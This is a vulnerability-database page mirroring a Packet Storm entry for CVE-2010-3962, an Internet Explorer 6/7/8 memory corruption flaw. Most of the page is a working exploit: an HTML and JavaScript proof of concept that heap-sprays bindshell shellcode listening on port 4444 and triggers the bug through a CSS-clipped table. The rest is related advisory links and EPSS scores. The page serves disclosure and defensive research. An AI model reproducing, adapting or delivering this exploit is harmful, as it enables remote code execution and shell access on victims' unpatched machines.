Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMatteo MemelliPACKETSTORM:95516
HistoryNov 05, 2010 - 12:00 a.m.

Microsoft Internet Explorer 6 / 7 / 8 Memory Corruption

2010-11-0500:00:00
Matteo Memelli
packetstormsecurity.com
27

EPSS

0.97

Percentile

99.8%

JSON
`# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962  
# Tested on Windows XP SP3 IE6 IE7 IE8  
# Coded by Matteo Memelli ryujin __at__ offsec.com  
# http://www.offensive-security.com/0day/ie-0day.txt  
# Thx to dookie __at__ offsec.com  
# notes : This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it  
  
<!-- Tested on IE6/IE7/IE8 XPSP3 quick and dirty sploit for CVE-2010-3962 zeroday  
Matteo Memelli, ryujin __at__ offsec.com thx to dookie __at__ offsec.com //-->  
<html>  
<head><title>poc CVE-2010-3962 zeroday</title>  
<script>  
function alloc(bytes, mystr) {  
// Bindshell on port 4444  
var shellcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b'+  
'%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b'+  
'%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34'+  
'%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301'+  
'%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a'+  
'%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4'+  
'%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268'+  
'%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468'+  
'%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912'+  
'%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856'+  
'%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd'+  
'%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5');  
while (mystr.length< bytes) mystr += mystr;  
return mystr.substr(0, (bytes-6)/2) + shellcode;  
}  
</script>  
</head>  
<body>  
<script>  
alert('ph33r: click me');  
var evil = new Array();  
var FAKEOBJ = unescape("%u0d0d%u0d0d");  
//FAKEOBJ = alloc(233120, FAKEOBJ); // IE6  
//FAKEOBJ = alloc(733120, FAKEOBJ); // IE7  
FAKEOBJ = alloc(433120, FAKEOBJ); // IE8  
for (var k = 0; k < 1000; k++) {  
evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);  
}  
document.write("<table style=position:absolute;clip:rect(0)>");  
</script>  
  
</body>  
</html>  
  
`

Related

packetstorm 2
saint 4
seebug 1
prion 1
cvelist 1
exploitdb 3
canvas 1
securityvulns 2
metasploit 1
checkpoint_advisories 2
thn 1
cve 1
nvd 1
cert 1
exploitpack 1
zdt 1
threatpost 1
nessus 1
mskb 1
openvas 2
packetstorm
packetstorm
Internet Explorer CSS SetUserClip Memory Corruption
2010-12-14 00:00:00
Internet Explorer CSS Tags Memory Corruption
2010-11-05 00:00:00
saint
saint
Internet Explorer CSS clip attribute memory corruption
2010-11-16 00:00:00
Internet Explorer CSS clip attribute memory corruption
2010-11-16 00:00:00
Internet Explorer CSS clip attribute memory corruption
2010-11-16 00:00:00
seebug
seebug
Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit
2010-11-05 00:00:00
prion
prion
Memory corruption
2010-11-05 17:00:00
cvelist
cvelist
CVE-2010-3962
2010-11-05 16:28:00
exploitdb
exploitdb
Microsoft Internet Explorer - Memory Corruption
2010-11-04 00:00:00
Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)
2011-01-20 00:00:00
Microsoft Internet Explorer 6/7/8 - Memory Corruption
2010-11-04 00:00:00
canvas
canvas
Immunity Canvas: IE_SETUSERCLIP
2010-11-05 17:00:00
securityvulns
securityvulns
iDefense Security Advisory 12.14.10: Microsoft Internet Explorer CSS Style Table Layout Uninitialized Memory Vulnerability
2010-12-15 00:00:00
Microsoft Security Bulletin MS10-090 - Critical Cumulative Security Update for Internet Explorer &#40;2416400&#41;
2010-12-15 00:00:00
metasploit
metasploit
MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption
2010-12-14 18:41:20
checkpoint_advisories
checkpoint_advisories
Internet Explorer Table Handling Memory Corruption (CVE-2010-3962)
2010-11-04 00:00:00
Microsoft Internet Explorer CSS Table Handling Memory Corruption (MS10-090; CVE-2010-3962)
2014-04-13 00:00:00
thn
thn
Top 5 Internet Security Threats for Businesses in 2023
2010-12-23 23:51:00
cve
cve
CVE-2010-3962
2010-11-05 17:00:02
nvd
nvd
CVE-2010-3962
2010-11-05 17:00:02
cert
cert
Microsoft Internet Explorer invalid flag reference vulnerability
2010-11-03 00:00:00
exploitpack
exploitpack
Microsoft Internet Explorer 678 - Memory Corruption
2010-11-04 00:00:00
zdt
zdt
Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit
2010-11-05 00:00:00
threatpost
threatpost
New Remotely Exploitable Bug Found in Internet Explorer
2010-12-10 14:22:34
nessus
nessus
MS10-090: Cumulative Security Update for Internet Explorer (2416400)
2010-12-15 00:00:00
mskb
mskb
MS10-090: Cumulative security update for Internet Explorer
2014-06-21 14:33:28
openvas
openvas
Microsoft Internet Explorer Multiple Vulnerabilities (2416400)
2010-12-15 00:00:00
Microsoft Internet Explorer Multiple Vulnerabilities (2416400)
2010-12-15 00:00:00

EPSS

0.97

Percentile

99.8%

JSON
Related for PACKETSTORM:95516
packetstorm2saint4seebug1prion1cvelist1exploitdb3canvas1securityvulns2metasploit1checkpoint_advisories2thn1cve1nvd1cert1exploitpack1zdt1threatpost1nessus1mskb1openvas2